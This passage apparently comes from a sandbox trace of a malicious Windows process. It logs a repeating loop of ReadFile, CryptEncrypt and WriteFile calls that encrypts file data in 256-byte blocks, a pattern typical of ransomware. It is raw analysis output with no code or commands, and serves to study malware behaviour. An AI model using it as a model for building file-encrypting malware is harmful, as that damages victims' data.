lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.534] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.534] GetLastError () returned 0x0 [0170.534] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.534] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.534] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.534] GetLastError () returned 0x0 [0170.534] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.534] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.534] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.534] GetLastError () returned 0x0 [0170.534] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.534] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.534] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.534] GetLastError () returned 0x0 [0170.534] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.535] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.535] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.535] GetLastError () returned 0x0 [0170.535] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.535] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.535] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.535] GetLastError () returned 0x0 [0170.535] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.535] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.535] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.535] GetLastError () returned 0x0 [0170.535] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.535] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.535] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.535] GetLastError () returned 0x0 [0170.535] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.535] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.535] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.535] GetLastError () returned 0x0 [0170.536] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.536] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.536] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.536] GetLastError () returned 0x0 [0170.536] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.536] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.536] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.536] GetLastError () returned 0x0 [0170.536] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.536] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.536] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.536] GetLastError () returned 0x0 [0170.536] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.536] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.536] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.536] GetLastError () returned 0x0 [0170.536] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.536] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.537] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.537] GetLastError () returned 0x0 [0170.537] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.537] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.537] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.537] GetLastError () returned 0x0 [0170.537] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.537] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.537] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.537] GetLastError () returned 0x0 [0170.537] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.537] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.537] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.537] GetLastError () returned 0x0 [0170.537] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.537] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.537] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.538] GetLastError () returned 0x0 [0170.538] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.538] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.538] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.538] GetLastError () returned 0x0 [0170.538] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.538] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.538] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.538] GetLastError () returned 0x0 [0170.538] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.538] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.538] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.538] GetLastError () returned 0x0 [0170.538] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.538] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.538] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.538] GetLastError () returned 0x0 [0170.538] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.538] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.539] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.539] GetLastError () returned 0x0 [0170.539] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.539] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.539] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.539] GetLastError () returned 0x0 [0170.539] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.539] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.539] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.539] GetLastError () returned 0x0 [0170.539] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.539] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.539] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.539] GetLastError () returned 0x0 [0170.539] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.539] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.539] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.539] GetLastError () returned 0x0 [0170.539] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.540] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.540] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.540] GetLastError () returned 0x0 [0170.540] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.540] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.540] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.540] GetLastError () returned 0x0 [0170.540] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.540] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.540] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.540] GetLastError () returned 0x0 [0170.540] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.540] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.540] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.540] GetLastError () returned 0x0 [0170.540] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.540] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.540] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.540] GetLastError () returned 0x0 [0170.540] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.541] ReadFile (in: 